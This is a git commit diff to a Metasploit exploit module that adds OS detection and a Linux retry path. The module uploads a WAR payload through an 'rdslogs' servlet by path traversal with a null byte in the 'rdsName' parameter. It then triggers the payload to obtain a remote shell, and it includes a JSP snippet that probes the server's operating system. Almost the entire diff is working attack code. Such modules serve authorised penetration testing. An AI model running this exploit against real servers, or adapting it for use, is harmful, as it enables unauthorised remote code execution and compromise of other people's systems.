Fix Linux target by trying again if exploit fails
Pedro Ribeiro
parent
2ce00d2239
commit
7483e77bba
|
|
@ -75,18 +75,66 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def pick_target
|
||||
unless target.name == 'Automatic'
|
||||
return target
|
||||
end
|
||||
|
||||
print_status("#{peer} - Determining target")
|
||||
os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
|
||||
url = upload_payload(os_finder_payload, false)
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['TARGETURI'], url),
|
||||
'method' => 'GET',
|
||||
'cookie' => @cookie,
|
||||
'headers' => { 'Referer' => Rex::Text.rand_text_alpha(10 + rand(10)) }
|
||||
})
|
||||
|
||||
if res && res.code == 200
|
||||
if res.body.to_s =~ /Linux/
|
||||
register_files_for_cleanup('webapps/' + url)
|
||||
return targets[1]
|
||||
elsif res.body.to_s =~ /Windows/
|
||||
register_files_for_cleanup('root/' + url)
|
||||
return targets[2]
|
||||
end
|
||||
end
|
||||
|
||||
nil
|
||||
end
|
||||
|
||||
|
||||
def send_payload(war_payload, tomcat_path, app_base)
|
||||
# We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail
|
||||
print_status("#{peer} - Uploading WAR file...")
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'),
|
||||
'method' => 'POST',
|
||||
'data' => Zlib::Deflate.deflate(war_payload),
|
||||
'ctype' => 'application/octet-stream',
|
||||
'vars_get' => {
|
||||
'rdsName' => "../../../../#{tomcat_path}#{app_base}.war\x00"
|
||||
}
|
||||
})
|
||||
|
||||
# The server either returns a 200 OK when the upload is successful.
|
||||
if res && res.code == 200
|
||||
print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
app_base = rand_text_alphanumeric(4 + rand(32 - 4))
|
||||
tomcat_path = '../../../../'
|
||||
servlet_path = 'rdslogs'
|
||||
|
||||
# We need to create the upload directories before our first attempt to upload the WAR.
|
||||
print_status("#{peer} - Creating upload directory")
|
||||
bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
|
||||
send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
|
||||
'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'),
|
||||
'method' => 'POST',
|
||||
'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))),
|
||||
'ctype' => 'application/xml',
|
||||
|
|
@ -95,27 +143,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
})
|
||||
|
||||
app_base = rand_text_alphanumeric(4 + rand(32 - 4))
|
||||
war_payload = payload.encoded_war({ :app_name => app_base }).to_s
|
||||
|
||||
# We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail
|
||||
print_status("#{peer} - Uploading WAR file...")
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
|
||||
'method' => 'POST',
|
||||
'data' => Zlib::Deflate.deflate(war_payload),
|
||||
'ctype' => 'application/octet-stream',
|
||||
'vars_get' => {
|
||||
'rdsName' => "#{tomcat_path}/tomcat/webapps/#{app_base}.war\x00"
|
||||
}
|
||||
})
|
||||
|
||||
# The server either returns a 200 OK when the upload is successful.
|
||||
if res && res.code == 200
|
||||
print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
|
||||
register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
|
||||
end
|
||||
|
||||
send_payload(war_payload, 'tomcat/webapps/', app_base)
|
||||
register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
|
||||
|
||||
10.times do
|
||||
select(nil, nil, nil, 2)
|
||||
|
|
@ -131,5 +163,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Success! Triggered the payload, should have a shell incoming
|
||||
break if res.code == 200
|
||||
end
|
||||
print_error("#{peer} - Failed to launch payload. Trying one last time with a different path...")
|
||||
|
||||
# OK this might be a Linux server, it's a different traversal path.
|
||||
# Let's try again...
|
||||
send_payload(war_payload, '', app_base)
|
||||
register_files_for_cleanup("webapps/#{app_base}.war")
|
||||
|
||||
10.times do
|
||||
select(nil, nil, nil, 2)
|
||||
|
||||
# Now make a request to trigger the newly deployed war
|
||||
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
|
||||
'method' => 'GET'
|
||||
})
|
||||
# Failure. The request timed out or the server went away.
|
||||
break if res.nil?
|
||||
# Success! Triggered the payload, should have a shell incoming
|
||||
break if res.code == 200
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue